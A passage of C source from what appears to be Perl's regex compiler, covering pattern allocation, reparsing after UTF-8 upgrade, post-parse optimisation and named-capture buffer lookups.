* Things get a touch tricky as we have to compare the utf8 flag
* independently from the compile flags. */
if ( old_re
&& !recompile
&& !!RX_UTF8(old_re) == !!RExC_utf8
&& ( RX_COMPFLAGS(old_re) == ( orig_rx_flags & RXf_PMf_FLAGCOPYMASK ) )
&& RX_PRECOMP(old_re)
&& RX_PRELEN(old_re) == plen
&& memEQ(RX_PRECOMP(old_re), exp, plen)
&& !runtime_code /* with runtime code, always recompile */ )
{
return old_re;
}
/* Allocate the pattern's SV */
RExC_rx_sv = Rx = (REGEXP*) newSV_type(SVt_REGEXP);
RExC_rx = ReANY(Rx);
if ( RExC_rx == NULL )
FAIL("Regexp out of space");
rx_flags = orig_rx_flags;
if ( (UTF || RExC_uni_semantics)
&& initial_charset == REGEX_DEPENDS_CHARSET)
{
/* Set to use unicode semantics if the pattern is in utf8 and has the
* 'depends' charset specified, as it means unicode when utf8 */
set_regex_charset(&rx_flags, REGEX_UNICODE_CHARSET);
RExC_uni_semantics = 1;
}
RExC_pm_flags = pm_flags;
if (runtime_code) {
assert(TAINTING_get || !TAINT_get);
if (TAINT_get)
Perl_croak(aTHX_ "Eval-group in insecure regular expression");
if (!S_compile_runtime_code(aTHX_ pRExC_state, exp, plen)) {
/* whoops, we have a non-utf8 pattern, whilst run-time code
* got compiled as utf8. Try again with a utf8 pattern */
S_pat_upgrade_to_utf8(aTHX_ pRExC_state, &exp, &plen,
pRExC_state->code_blocks ? pRExC_state->code_blocks->count : 0);
goto redo_parse;
}
}
assert(!pRExC_state->runtime_code_qr);
RExC_sawback = 0;
RExC_seen = 0;
RExC_maxlen = 0;
RExC_in_lookbehind = 0;
RExC_seen_zerolen = *exp == '^' ? -1 : 0;
#ifdef EBCDIC
RExC_recode_x_to_native = 0;
#endif
RExC_in_multi_char_class = 0;
RExC_start = RExC_copy_start_in_constructed = RExC_copy_start_in_input = RExC_precomp = exp;
RExC_precomp_end = RExC_end = exp + plen;
RExC_nestroot = 0;
RExC_whilem_seen = 0;
RExC_end_op = NULL;
RExC_recurse = NULL;
RExC_study_chunk_recursed = NULL;
RExC_study_chunk_recursed_bytes= 0;
RExC_recurse_count = 0;
pRExC_state->code_index = 0;
/* Initialize the string in the compiled pattern. This is so that there is
* something to output if necessary */
set_regex_pv(pRExC_state, Rx);
DEBUG_PARSE_r({
Perl_re_printf( aTHX_
"Starting parse and generation\n");
RExC_lastnum=0;
RExC_lastparse=NULL;
});
    /* Allocate space and zero-initialize.  Note the two-step process of
       zeroing when in debug mode; thus anything assigned has to happen
       after that */
if (! RExC_size) {
/* On the first pass of the parse, we guess how big this will be. Then
* we grow in one operation to that amount and then give it back. As
* we go along, we re-allocate what we need.
*
* XXX Currently the guess is essentially that the pattern will be an
* EXACT node with one byte input, one byte output. This is crude, and
* better heuristics are welcome.
*
* On any subsequent passes, we guess what we actually computed in the
* latest earlier pass. Such a pass probably didn't complete so is
* missing stuff. We could improve those guesses by knowing where the
* parse stopped, and use the length so far plus apply the above
* assumption to what's left. */
RExC_size = STR_SZ(RExC_end - RExC_start);
}
Newxc(RExC_rxi, sizeof(regexp_internal) + RExC_size, char, regexp_internal);
if ( RExC_rxi == NULL )
FAIL("Regexp out of space");
Zero(RExC_rxi, sizeof(regexp_internal) + RExC_size, char);
RXi_SET( RExC_rx, RExC_rxi );
    /* We start from 0 (starting over, in the case this is a reparse).  The
     * first node parsed will give back any excess memory we have allocated
     * so far. */
RExC_size = 0;
/* non-zero initialization begins here */
RExC_rx->engine= eng;
RExC_rx->extflags = rx_flags;
RXp_COMPFLAGS(RExC_rx) = orig_rx_flags & RXf_PMf_FLAGCOPYMASK;
if (pm_flags & PMf_IS_QR) {
RExC_rxi->code_blocks = pRExC_state->code_blocks;
if (RExC_rxi->code_blocks) {
RExC_rxi->code_blocks->refcnt++;
}
}
RExC_rx->intflags = 0;
RExC_flags = rx_flags; /* don't let top level (?i) bleed */
RExC_parse = exp;
/* This NUL is guaranteed because the pattern comes from an SV*, and the sv
* code makes sure the final byte is an uncounted NUL. But should this
* ever not be the case, lots of things could read beyond the end of the
* buffer: loops like
* while(isFOO(*RExC_parse)) RExC_parse++;
* strchr(RExC_parse, "foo");
* etc. So it is worth noting. */
assert(*RExC_end == '\0');
RExC_naughty = 0;
RExC_npar = 1;
RExC_parens_buf_size = 0;
RExC_emit_start = RExC_rxi->program;
pRExC_state->code_index = 0;
*((char*) RExC_emit_start) = (char) REG_MAGIC;
RExC_emit = 1;
/* Do the parse */
if (reg(pRExC_state, 0, &flags, 1)) {
        /* Success!  But we may need to redo the parse knowing how many parens
* there actually are */
if (IN_PARENS_PASS) {
flags |= RESTART_PARSE;
}
/* We have that number in RExC_npar */
RExC_total_parens = RExC_npar;
}
else if (! MUST_RESTART(flags)) {
ReREFCNT_dec(Rx);
Perl_croak(aTHX_ "panic: reg returned failure to re_op_compile, flags=%#" UVxf, (UV) flags);
}
/* Here, we either have success, or we have to redo the parse for some reason */
if (MUST_RESTART(flags)) {
/* It's possible to write a regexp in ascii that represents Unicode
codepoints outside of the byte range, such as via \x{100}. If we
detect such a sequence we have to convert the entire pattern to utf8
and then recompile, as our sizing calculation will have been based
on 1 byte == 1 character, but we will need to use utf8 to encode
at least some part of the pattern, and therefore must convert the whole
thing.
-- dmq */
if (flags & NEED_UTF8) {
/* We have stored the offset of the final warning output so far.
* That must be adjusted. Any variant characters between the start
* of the pattern and this warning count for 2 bytes in the final,
* so just add them again */
if (UNLIKELY(RExC_latest_warn_offset > 0)) {
RExC_latest_warn_offset +=
variant_under_utf8_count((U8 *) exp, (U8 *) exp
+ RExC_latest_warn_offset);
}
S_pat_upgrade_to_utf8(aTHX_ pRExC_state, &exp, &plen,
pRExC_state->code_blocks ? pRExC_state->code_blocks->count : 0);
DEBUG_PARSE_r(Perl_re_printf( aTHX_ "Need to redo parse after upgrade\n"));
}
else {
DEBUG_PARSE_r(Perl_re_printf( aTHX_ "Need to redo parse\n"));
}
if (ALL_PARENS_COUNTED) {
/* Make enough room for all the known parens, and zero it */
Renew(RExC_open_parens, RExC_total_parens, regnode_offset);
Zero(RExC_open_parens, RExC_total_parens, regnode_offset);
RExC_open_parens[0] = 1; /* +1 for REG_MAGIC */
Renew(RExC_close_parens, RExC_total_parens, regnode_offset);
Zero(RExC_close_parens, RExC_total_parens, regnode_offset);
}
else { /* Parse did not complete. Reinitialize the parentheses
structures */
RExC_total_parens = 0;
if (RExC_open_parens) {
Safefree(RExC_open_parens);
RExC_open_parens = NULL;
}
if (RExC_close_parens) {
Safefree(RExC_close_parens);
RExC_close_parens = NULL;
}
}
/* Clean up what we did in this parse */
SvREFCNT_dec_NN(RExC_rx_sv);
goto redo_parse;
}
/* Here, we have successfully parsed and generated the pattern's program
* for the regex engine. We are ready to finish things up and look for
* optimizations. */
/* Update the string to compile, with correct modifiers, etc */
set_regex_pv(pRExC_state, Rx);
RExC_rx->nparens = RExC_total_parens - 1;
/* Uses the upper 4 bits of the FLAGS field, so keep within that size */
if (RExC_whilem_seen > 15)
RExC_whilem_seen = 15;
DEBUG_PARSE_r({
Perl_re_printf( aTHX_
"Required size %" IVdf " nodes\n", (IV)RExC_size);
RExC_lastnum=0;
RExC_lastparse=NULL;
});
#ifdef RE_TRACK_PATTERN_OFFSETS
DEBUG_OFFSETS_r(Perl_re_printf( aTHX_
"%s %" UVuf " bytes for offset annotations.\n",
RExC_offsets ? "Got" : "Couldn't get",
(UV)((RExC_offsets[0] * 2 + 1))));
DEBUG_OFFSETS_r(if (RExC_offsets) {
const STRLEN len = RExC_offsets[0];
STRLEN i;
GET_RE_DEBUG_FLAGS_DECL;
Perl_re_printf( aTHX_
"Offsets: [%" UVuf "]\n\t", (UV)RExC_offsets[0]);
for (i = 1; i <= len; i++) {
if (RExC_offsets[i*2-1] || RExC_offsets[i*2])
Perl_re_printf( aTHX_ "%" UVuf ":%" UVuf "[%" UVuf "] ",
(UV)i, (UV)RExC_offsets[i*2-1], (UV)RExC_offsets[i*2]);
}
Perl_re_printf( aTHX_ "\n");
});
#else
SetProgLen(RExC_rxi,RExC_size);
#endif
DEBUG_OPTIMISE_r(
Perl_re_printf( aTHX_ "Starting post parse optimization\n");
);
/* XXXX To minimize changes to RE engine we always allocate
3-units-long substrs field. */
Newx(RExC_rx->substrs, 1, struct reg_substr_data);
if (RExC_recurse_count) {
Newx(RExC_recurse, RExC_recurse_count, regnode *);
SAVEFREEPV(RExC_recurse);
}
if (RExC_seen & REG_RECURSE_SEEN) {
/* Note, RExC_total_parens is 1 + the number of parens in a pattern.
         * So it's 1 if there are no parens. */
RExC_study_chunk_recursed_bytes= (RExC_total_parens >> 3) +
((RExC_total_parens & 0x07) != 0);
Newx(RExC_study_chunk_recursed,
RExC_study_chunk_recursed_bytes * RExC_total_parens, U8);
SAVEFREEPV(RExC_study_chunk_recursed);
}
reStudy:
RExC_rx->minlen = minlen = sawlookahead = sawplus = sawopen = sawminmod = 0;
DEBUG_r(
RExC_study_chunk_recursed_count= 0;
);
Zero(RExC_rx->substrs, 1, struct reg_substr_data);
if (RExC_study_chunk_recursed) {
Zero(RExC_study_chunk_recursed,
RExC_study_chunk_recursed_bytes * RExC_total_parens, U8);
}
#ifdef TRIE_STUDY_OPT
if (!restudied) {
StructCopy(&zero_scan_data, &data, scan_data_t);
copyRExC_state = RExC_state;
} else {
U32 seen=RExC_seen;
DEBUG_OPTIMISE_r(Perl_re_printf( aTHX_ "Restudying\n"));
RExC_state = copyRExC_state;
if (seen & REG_TOP_LEVEL_BRANCHES_SEEN)
RExC_seen |= REG_TOP_LEVEL_BRANCHES_SEEN;
else
RExC_seen &= ~REG_TOP_LEVEL_BRANCHES_SEEN;
StructCopy(&zero_scan_data, &data, scan_data_t);
}
#else
StructCopy(&zero_scan_data, &data, scan_data_t);
#endif
/* Dig out information for optimizations. */
RExC_rx->extflags = RExC_flags; /* was pm_op */
/*dmq: removed as part of de-PMOP: pm->op_pmflags = RExC_flags; */
if (UTF)
SvUTF8_on(Rx); /* Unicode in it? */
RExC_rxi->regstclass = NULL;
if (RExC_naughty >= TOO_NAUGHTY) /* Probably an expensive pattern. */
RExC_rx->intflags |= PREGf_NAUGHTY;
scan = RExC_rxi->program + 1; /* First BRANCH. */
/* testing for BRANCH here tells us whether there is "must appear"
data in the pattern. If there is then we can use it for optimisations */
if (!(RExC_seen & REG_TOP_LEVEL_BRANCHES_SEEN)) { /* Only one top-level choice.
*/
SSize_t fake;
STRLEN longest_length[2];
regnode_ssc ch_class; /* pointed to by data */
int stclass_flag;
SSize_t last_close = 0; /* pointed to by data */
regnode *first= scan;
regnode *first_next= regnext(first);
int i;
/*
* Skip introductions and multiplicators >= 1
* so that we can extract the 'meat' of the pattern that must
* match in the large if() sequence following.
* NOTE that EXACT is NOT covered here, as it is normally
* picked up by the optimiser separately.
*
         * This is unfortunate as the optimiser isn't handling lookahead
* properly currently.
*
*/
while ((OP(first) == OPEN && (sawopen = 1)) ||
/* An OR of *one* alternative - should not happen now. */
(OP(first) == BRANCH && OP(first_next) != BRANCH) ||
/* for now we can't handle lookbehind IFMATCH*/
(OP(first) == IFMATCH && !first->flags && (sawlookahead = 1)) ||
(OP(first) == PLUS) ||
(OP(first) == MINMOD) ||
/* An {n,m} with n>0 */
(PL_regkind[OP(first)] == CURLY && ARG1(first) > 0) ||
(OP(first) == NOTHING && PL_regkind[OP(first_next)] != END ))
{
/*
* the only op that could be a regnode is PLUS, all the rest
* will be regnode_1 or regnode_2.
*
* (yves doesn't think this is true)
*/
if (OP(first) == PLUS)
sawplus = 1;
else {
if (OP(first) == MINMOD)
sawminmod = 1;
first += regarglen[OP(first)];
}
first = NEXTOPER(first);
first_next= regnext(first);
}
/* Starting-point info. */
again:
DEBUG_PEEP("first:", first, 0, 0);
/* Ignore EXACT as we deal with it later. */
if (PL_regkind[OP(first)] == EXACT) {
if ( OP(first) == EXACT
|| OP(first) == EXACT_ONLY8
|| OP(first) == EXACTL)
{
NOOP; /* Empty, get anchored substr later. */
}
else
RExC_rxi->regstclass = first;
}
#ifdef TRIE_STCLASS
else if (PL_regkind[OP(first)] == TRIE &&
((reg_trie_data *)RExC_rxi->data->data[ ARG(first) ])->minlen>0)
{
/* this can happen only on restudy */
RExC_rxi->regstclass = construct_ahocorasick_from_trie(pRExC_state, (regnode *)first, 0);
}
#endif
else if (REGNODE_SIMPLE(OP(first)))
RExC_rxi->regstclass = first;
else if (PL_regkind[OP(first)] == BOUND ||
PL_regkind[OP(first)] == NBOUND)
RExC_rxi->regstclass = first;
else if (PL_regkind[OP(first)] == BOL) {
RExC_rx->intflags |= (OP(first) == MBOL
? PREGf_ANCH_MBOL
: PREGf_ANCH_SBOL);
first = NEXTOPER(first);
goto again;
}
else if (OP(first) == GPOS) {
RExC_rx->intflags |= PREGf_ANCH_GPOS;
first = NEXTOPER(first);
goto again;
}
else if ((!sawopen || !RExC_sawback) &&
!sawlookahead &&
(OP(first) == STAR &&
PL_regkind[OP(NEXTOPER(first))] == REG_ANY) &&
!(RExC_rx->intflags & PREGf_ANCH) && !pRExC_state->code_blocks)
{
/* turn .* into ^.* with an implied $*=1 */
const int type =
(OP(NEXTOPER(first)) == REG_ANY)
? PREGf_ANCH_MBOL
: PREGf_ANCH_SBOL;
RExC_rx->intflags |= (type | PREGf_IMPLICIT);
first = NEXTOPER(first);
goto again;
}
if (sawplus && !sawminmod && !sawlookahead
&& (!sawopen || !RExC_sawback)
&& !pRExC_state->code_blocks) /* May examine pos and $& */
            /* x+ must match at the 1st pos of a run of x's */
RExC_rx->intflags |= PREGf_SKIP;
/* Scan is after the zeroth branch, first is atomic matcher. */
#ifdef TRIE_STUDY_OPT
DEBUG_PARSE_r(
if (!restudied)
Perl_re_printf( aTHX_ "first at %" IVdf "\n",
(IV)(first - scan + 1))
);
#else
DEBUG_PARSE_r(
Perl_re_printf( aTHX_ "first at %" IVdf "\n",
(IV)(first - scan + 1))
);
#endif
/*
* If there's something expensive in the r.e., find the
* longest literal string that must appear and make it the
* regmust. Resolve ties in favor of later strings, since
* the regstart check works with the beginning of the r.e.
* and avoiding duplication strengthens checking. Not a
* strong reason, but sufficient in the absence of others.
* [Now we resolve ties in favor of the earlier string if
* it happens that c_offset_min has been invalidated, since the
* earlier string may buy us something the later one won't.]
*/
data.substrs[0].str = newSVpvs("");
data.substrs[1].str = newSVpvs("");
data.last_found = newSVpvs("");
data.cur_is_floating = 0; /* initially any found substring is fixed */
ENTER_with_name("study_chunk");
SAVEFREESV(data.substrs[0].str);
SAVEFREESV(data.substrs[1].str);
SAVEFREESV(data.last_found);
first = scan;
if (!RExC_rxi->regstclass) {
ssc_init(pRExC_state, &ch_class);
data.start_class = &ch_class;
stclass_flag = SCF_DO_STCLASS_AND;
} else /* XXXX Check for BOUND? */
stclass_flag = 0;
data.last_closep = &last_close;
DEBUG_RExC_seen();
/*
* MAIN ENTRY FOR study_chunk() FOR m/PATTERN/
* (NO top level branches)
*/
minlen = study_chunk(pRExC_state, &first, &minlen, &fake,
scan + RExC_size, /* Up to end */
&data, -1, 0, NULL,
SCF_DO_SUBSTR | SCF_WHILEM_VISITED_POS | stclass_flag
| (restudied ? SCF_TRIE_DOING_RESTUDY : 0),
0);
CHECK_RESTUDY_GOTO_butfirst(LEAVE_with_name("study_chunk"));
if ( RExC_total_parens == 1 && !data.cur_is_floating
&& data.last_start_min == 0 && data.last_end > 0
&& !RExC_seen_zerolen
&& !(RExC_seen & REG_VERBARG_SEEN)
&& !(RExC_seen & REG_GPOS_SEEN)
){
RExC_rx->extflags |= RXf_CHECK_ALL;
}
scan_commit(pRExC_state, &data,&minlen, 0);
/* XXX this is done in reverse order because that's the way the
* code was before it was parameterised. Don't know whether it
* actually needs doing in reverse order. DAPM */
for (i = 1; i >= 0; i--) {
longest_length[i] = CHR_SVLEN(data.substrs[i].str);
if ( !( i
&& SvCUR(data.substrs[0].str) /* ok to leave SvCUR */
&& data.substrs[0].min_offset
== data.substrs[1].min_offset
&& SvCUR(data.substrs[0].str)
== SvCUR(data.substrs[1].str)
)
&& S_setup_longest (aTHX_ pRExC_state,
&(RExC_rx->substrs->data[i]),
&(data.substrs[i]),
longest_length[i]))
{
RExC_rx->substrs->data[i].min_offset =
data.substrs[i].min_offset - data.substrs[i].lookbehind;
RExC_rx->substrs->data[i].max_offset = data.substrs[i].max_offset;
/* Don't offset infinity */
if (data.substrs[i].max_offset < SSize_t_MAX)
RExC_rx->substrs->data[i].max_offset -= data.substrs[i].lookbehind;
SvREFCNT_inc_simple_void_NN(data.substrs[i].str);
}
else {
RExC_rx->substrs->data[i].substr = NULL;
RExC_rx->substrs->data[i].utf8_substr = NULL;
longest_length[i] = 0;
}
}
LEAVE_with_name("study_chunk");
if (RExC_rxi->regstclass
&& (OP(RExC_rxi->regstclass) == REG_ANY || OP(RExC_rxi->regstclass) == SANY))
RExC_rxi->regstclass = NULL;
if ((!(RExC_rx->substrs->data[0].substr || RExC_rx->substrs->data[0].utf8_substr)
|| RExC_rx->substrs->data[0].min_offset)
&& stclass_flag
&& ! (ANYOF_FLAGS(data.start_class) & SSC_MATCHES_EMPTY_STRING)
&& is_ssc_worth_it(pRExC_state, data.start_class))
{
const U32 n = add_data(pRExC_state, STR_WITH_LEN("f"));
ssc_finalize(pRExC_state, data.start_class);
Newx(RExC_rxi->data->data[n], 1, regnode_ssc);
StructCopy(data.start_class,
(regnode_ssc*)RExC_rxi->data->data[n],
regnode_ssc);
RExC_rxi->regstclass = (regnode*)RExC_rxi->data->data[n];
RExC_rx->intflags &= ~PREGf_SKIP; /* Used in find_byclass(). */
DEBUG_COMPILE_r({ SV *sv = sv_newmortal();
regprop(RExC_rx, sv, (regnode*)data.start_class, NULL, pRExC_state);
Perl_re_printf( aTHX_
"synthetic stclass \"%s\".\n",
SvPVX_const(sv));});
data.start_class = NULL;
}
        /* A temporary algorithm prefers a floating substr to a fixed one of
         * the same length, in order to dig out more info. */
i = (longest_length[0] <= longest_length[1]);
RExC_rx->substrs->check_ix = i;
RExC_rx->check_end_shift = RExC_rx->substrs->data[i].end_shift;
RExC_rx->check_substr = RExC_rx->substrs->data[i].substr;
RExC_rx->check_utf8 = RExC_rx->substrs->data[i].utf8_substr;
RExC_rx->check_offset_min = RExC_rx->substrs->data[i].min_offset;
RExC_rx->check_offset_max = RExC_rx->substrs->data[i].max_offset;
if (!i && (RExC_rx->intflags & (PREGf_ANCH_SBOL|PREGf_ANCH_GPOS)))
RExC_rx->intflags |= PREGf_NOSCAN;
if ((RExC_rx->check_substr || RExC_rx->check_utf8) ) {
RExC_rx->extflags |= RXf_USE_INTUIT;
if (SvTAIL(RExC_rx->check_substr ? RExC_rx->check_substr : RExC_rx->check_utf8))
RExC_rx->extflags |= RXf_INTUIT_TAIL;
}
/* XXX Unneeded? dmq (shouldn't as this is handled elsewhere)
if ( (STRLEN)minlen < longest_length[1] )
minlen= longest_length[1];
if ( (STRLEN)minlen < longest_length[0] )
minlen= longest_length[0];
*/
}
else {
        /* Several toplevels.  The best we can do is to set minlen. */
SSize_t fake;
regnode_ssc ch_class;
SSize_t last_close = 0;
DEBUG_PARSE_r(Perl_re_printf( aTHX_ "\nMulti Top Level\n"));
scan = RExC_rxi->program + 1;
ssc_init(pRExC_state, &ch_class);
data.start_class = &ch_class;
data.last_closep = &last_close;
DEBUG_RExC_seen();
/*
* MAIN ENTRY FOR study_chunk() FOR m/P1|P2|.../
* (patterns WITH top level branches)
*/
minlen = study_chunk(pRExC_state,
&scan, &minlen, &fake, scan + RExC_size, &data, -1, 0, NULL,
SCF_DO_STCLASS_AND|SCF_WHILEM_VISITED_POS|(restudied
? SCF_TRIE_DOING_RESTUDY
: 0),
0);
CHECK_RESTUDY_GOTO_butfirst(NOOP);
RExC_rx->check_substr = NULL;
RExC_rx->check_utf8 = NULL;
RExC_rx->substrs->data[0].substr = NULL;
RExC_rx->substrs->data[0].utf8_substr = NULL;
RExC_rx->substrs->data[1].substr = NULL;
RExC_rx->substrs->data[1].utf8_substr = NULL;
if (! (ANYOF_FLAGS(data.start_class) & SSC_MATCHES_EMPTY_STRING)
&& is_ssc_worth_it(pRExC_state, data.start_class))
{
const U32 n = add_data(pRExC_state, STR_WITH_LEN("f"));
ssc_finalize(pRExC_state, data.start_class);
Newx(RExC_rxi->data->data[n], 1, regnode_ssc);
StructCopy(data.start_class,
(regnode_ssc*)RExC_rxi->data->data[n],
regnode_ssc);
RExC_rxi->regstclass = (regnode*)RExC_rxi->data->data[n];
RExC_rx->intflags &= ~PREGf_SKIP; /* Used in find_byclass(). */
DEBUG_COMPILE_r({ SV* sv = sv_newmortal();
regprop(RExC_rx, sv, (regnode*)data.start_class, NULL, pRExC_state);
Perl_re_printf( aTHX_
"synthetic stclass \"%s\".\n",
SvPVX_const(sv));});
data.start_class = NULL;
}
}
if (RExC_seen & REG_UNBOUNDED_QUANTIFIER_SEEN) {
RExC_rx->extflags |= RXf_UNBOUNDED_QUANTIFIER_SEEN;
RExC_rx->maxlen = REG_INFTY;
}
else {
RExC_rx->maxlen = RExC_maxlen;
}
/* Guard against an embedded (?=) or (?<=) with a longer minlen than
the "real" pattern. */
DEBUG_OPTIMISE_r({
Perl_re_printf( aTHX_ "minlen: %" IVdf " RExC_rx->minlen:%" IVdf " maxlen:%" IVdf "\n",
(IV)minlen, (IV)RExC_rx->minlen, (IV)RExC_maxlen);
});
RExC_rx->minlenret = minlen;
if (RExC_rx->minlen < minlen)
RExC_rx->minlen = minlen;
if (RExC_seen & REG_RECURSE_SEEN ) {
RExC_rx->intflags |= PREGf_RECURSE_SEEN;
Newx(RExC_rx->recurse_locinput, RExC_rx->nparens + 1, char *);
}
if (RExC_seen & REG_GPOS_SEEN)
RExC_rx->intflags |= PREGf_GPOS_SEEN;
if (RExC_seen & REG_LOOKBEHIND_SEEN)
RExC_rx->extflags |= RXf_NO_INPLACE_SUBST; /* inplace might break the
lookbehind */
if (pRExC_state->code_blocks)
RExC_rx->extflags |= RXf_EVAL_SEEN;
if (RExC_seen & REG_VERBARG_SEEN)
{
RExC_rx->intflags |= PREGf_VERBARG_SEEN;
RExC_rx->extflags |= RXf_NO_INPLACE_SUBST; /* don't understand this! Yves */
}
if (RExC_seen & REG_CUTGROUP_SEEN)
RExC_rx->intflags |= PREGf_CUTGROUP_SEEN;
if (pm_flags & PMf_USE_RE_EVAL)
RExC_rx->intflags |= PREGf_USE_RE_EVAL;
if (RExC_paren_names)
RXp_PAREN_NAMES(RExC_rx) = MUTABLE_HV(SvREFCNT_inc(RExC_paren_names));
else
RXp_PAREN_NAMES(RExC_rx) = NULL;
/* If we have seen an anchor in our pattern then we set the extflag RXf_IS_ANCHORED
* so it can be used in pp.c */
if (RExC_rx->intflags & PREGf_ANCH)
RExC_rx->extflags |= RXf_IS_ANCHORED;
{
/* this is used to identify "special" patterns that might result
* in Perl NOT calling the regex engine and instead doing the match "itself",
* particularly special cases in split//. By having the regex compiler
* do this pattern matching at a regop level (instead of by inspecting the pattern)
* we avoid weird issues with equivalent patterns resulting in different behavior,
     * AND we allow non-Perl engines to get the same optimizations by setting the
* flags appropriately - Yves */
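        /* Illustrative mapping, stated as an assumption about the callers
         * rather than verified here: split-like consumers generally treat
         * RXf_NULL as //, RXf_START_ONLY as /^/, RXf_WHITE as /\s+/, and
         * RXf_SKIPWHITE|RXf_WHITE as the awk-like split " " special case. */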
regnode *first = RExC_rxi->program + 1;
U8 fop = OP(first);
regnode *next = regnext(first);
U8 nop = OP(next);
if (PL_regkind[fop] == NOTHING && nop == END)
RExC_rx->extflags |= RXf_NULL;
else if ((fop == MBOL || (fop == SBOL && !first->flags)) && nop == END)
/* when fop is SBOL first->flags will be true only when it was
* produced by parsing /\A/, and not when parsing /^/. This is
* very important for the split code as there we want to
* treat /^/ as /^/m, but we do not want to treat /\A/ as /^/m.
* See rt #122761 for more details. -- Yves */
RExC_rx->extflags |= RXf_START_ONLY;
else if (fop == PLUS
&& PL_regkind[nop] == POSIXD && FLAGS(next) == _CC_SPACE
&& nop == END)
RExC_rx->extflags |= RXf_WHITE;
else if ( RExC_rx->extflags & RXf_SPLIT
&& (fop == EXACT || fop == EXACT_ONLY8 || fop == EXACTL)
&& STR_LEN(first) == 1
&& *(STRING(first)) == ' '
&& nop == END )
RExC_rx->extflags |= (RXf_SKIPWHITE|RXf_WHITE);
}
if (RExC_contains_locale) {
RXp_EXTFLAGS(RExC_rx) |= RXf_TAINTED;
}
#ifdef DEBUGGING
if (RExC_paren_names) {
RExC_rxi->name_list_idx = add_data( pRExC_state, STR_WITH_LEN("a"));
RExC_rxi->data->data[RExC_rxi->name_list_idx]
= (void*)SvREFCNT_inc(RExC_paren_name_list);
} else
#endif
RExC_rxi->name_list_idx = 0;
while ( RExC_recurse_count > 0 ) {
const regnode *scan = RExC_recurse[ --RExC_recurse_count ];
/*
* This data structure is set up in study_chunk() and is used
* to calculate the distance between a GOSUB regopcode and
* the OPEN/CURLYM (CURLYM's are special and can act like OPEN's)
* it refers to.
*
* If for some reason someone writes code that optimises
* away a GOSUB opcode then the assert should be changed to
* an if(scan) to guard the ARG2L_SET() - Yves
*
*/
assert(scan && OP(scan) == GOSUB);
ARG2L_SET( scan, RExC_open_parens[ARG(scan)] - REGNODE_OFFSET(scan));
}
Newxz(RExC_rx->offs, RExC_total_parens, regexp_paren_pair);
/* assume we don't need to swap parens around before we match */
DEBUG_TEST_r({
Perl_re_printf( aTHX_ "study_chunk_recursed_count: %lu\n",
(unsigned long)RExC_study_chunk_recursed_count);
});
DEBUG_DUMP_r({
DEBUG_RExC_seen();
Perl_re_printf( aTHX_ "Final program:\n");
regdump(RExC_rx);
});
if (RExC_open_parens) {
Safefree(RExC_open_parens);
RExC_open_parens = NULL;
}
if (RExC_close_parens) {
Safefree(RExC_close_parens);
RExC_close_parens = NULL;
}
#ifdef USE_ITHREADS
/* under ithreads the ?pat? PMf_USED flag on the pmop is simulated
     * by setting the regexp SV to read-only instead. If the
* pattern's been recompiled, the USEDness should remain. */
if (old_re && SvREADONLY(old_re))
SvREADONLY_on(Rx);
#endif
return Rx;
}
SV*
Perl_reg_named_buff(pTHX_ REGEXP * const rx, SV * const key, SV * const value,
const U32 flags)
{
PERL_ARGS_ASSERT_REG_NAMED_BUFF;
PERL_UNUSED_ARG(value);
if (flags & RXapif_FETCH) {
return reg_named_buff_fetch(rx, key, flags);
} else if (flags & (RXapif_STORE | RXapif_DELETE | RXapif_CLEAR)) {
Perl_croak_no_modify();
return NULL;
} else if (flags & RXapif_EXISTS) {
return reg_named_buff_exists(rx, key, flags)
? &PL_sv_yes
: &PL_sv_no;
} else if (flags & RXapif_REGNAMES) {
return reg_named_buff_all(rx, flags);
} else if (flags & (RXapif_SCALAR | RXapif_REGNAMES_COUNT)) {
return reg_named_buff_scalar(rx, flags);
} else {
Perl_croak(aTHX_ "panic: Unknown flags %d in named_buff", (int)flags);
return NULL;
}
}
SV*
Perl_reg_named_buff_iter(pTHX_ REGEXP * const rx, const SV * const lastkey,
const U32 flags)
{
PERL_ARGS_ASSERT_REG_NAMED_BUFF_ITER;
PERL_UNUSED_ARG(lastkey);
if (flags & RXapif_FIRSTKEY)
return reg_named_buff_firstkey(rx, flags);
else if (flags & RXapif_NEXTKEY)
return reg_named_buff_nextkey(rx, flags);
else {
Perl_croak(aTHX_ "panic: Unknown flags %d in named_buff_iter",
(int)flags);
return NULL;
}
}
SV*
Perl_reg_named_buff_fetch(pTHX_ REGEXP * const r, SV * const namesv,
const U32 flags)
{
SV *ret;
struct regexp *const rx = ReANY(r);
PERL_ARGS_ASSERT_REG_NAMED_BUFF_FETCH;
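    /* Descriptive note: Perl-level access normally reaches this through the
     * %+ and %- tied hashes (Tie::Hash::NamedCapture).  Without RXapif_ALL
     * the first matched buffer of the given name is returned as a single SV;
     * with RXapif_ALL a reference to an AV holding one entry per buffer of
     * that name is returned instead. */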
if (rx && RXp_PAREN_NAMES(rx)) {
HE *he_str = hv_fetch_ent( RXp_PAREN_NAMES(rx), namesv, 0, 0 );
if (he_str) {
IV i;
SV* sv_dat=HeVAL(he_str);
I32 *nums=(I32*)SvPVX(sv_dat);
AV * const retarray = (flags & RXapif_ALL) ? newAV() : NULL;
for ( i=0; i<SvIVX(sv_dat); i++ ) {
if ((I32)(rx->nparens) >= nums[i]
&& rx->offs[nums[i]].start != -1
&& rx->offs[nums[i]].end != -1)
{
ret = newSVpvs("");
CALLREG_NUMBUF_FETCH(r, nums[i], ret);
if (!retarray)
return ret;
} else {
if (retarray)
ret = newSVsv(&PL_sv_undef);
}
if (retarray)
av_push(retarray, ret);
}
if (retarray)
return newRV_noinc(MUTABLE_SV(retarray));
}
}
return NULL;
}
bool
Perl_reg_named_buff_exists(pTHX_ REGEXP * const r, SV * const key,
const U32 flags)
{
struct regexp *const rx = ReANY(r);
PERL_ARGS_ASSERT_REG_NAMED_BUFF_EXISTS;
if (rx && RXp_PAREN_NAMES(rx)) {
if (flags & RXapif_ALL) {
return hv_exists_ent(RXp_PAREN_NAMES(rx), key, 0);
} else {
SV *sv = CALLREG_NAMED_BUFF_FETCH(r, key, flags);
if (sv) {
SvREFCNT_dec_NN(sv);
return TRUE;
} else {
return FALSE;
}
}
} else {
return FALSE;
}
}
SV*
Perl_reg_named_buff_firstkey(pTHX_ REGEXP * const r, const U32 flags)
{
struct regexp *const rx = ReANY(r);
PERL_ARGS_ASSERT_REG_NAMED_BUFF_FIRSTKEY;
if ( rx && RXp_PAREN_NAMES(rx) ) {
(void)hv_iterinit(RXp_PAREN_NAMES(rx));
return CALLREG_NAMED_BUFF_NEXTKEY(r, NULL, flags & ~RXapif_FIRSTKEY);
} else {
return FALSE;
}
}
SV*
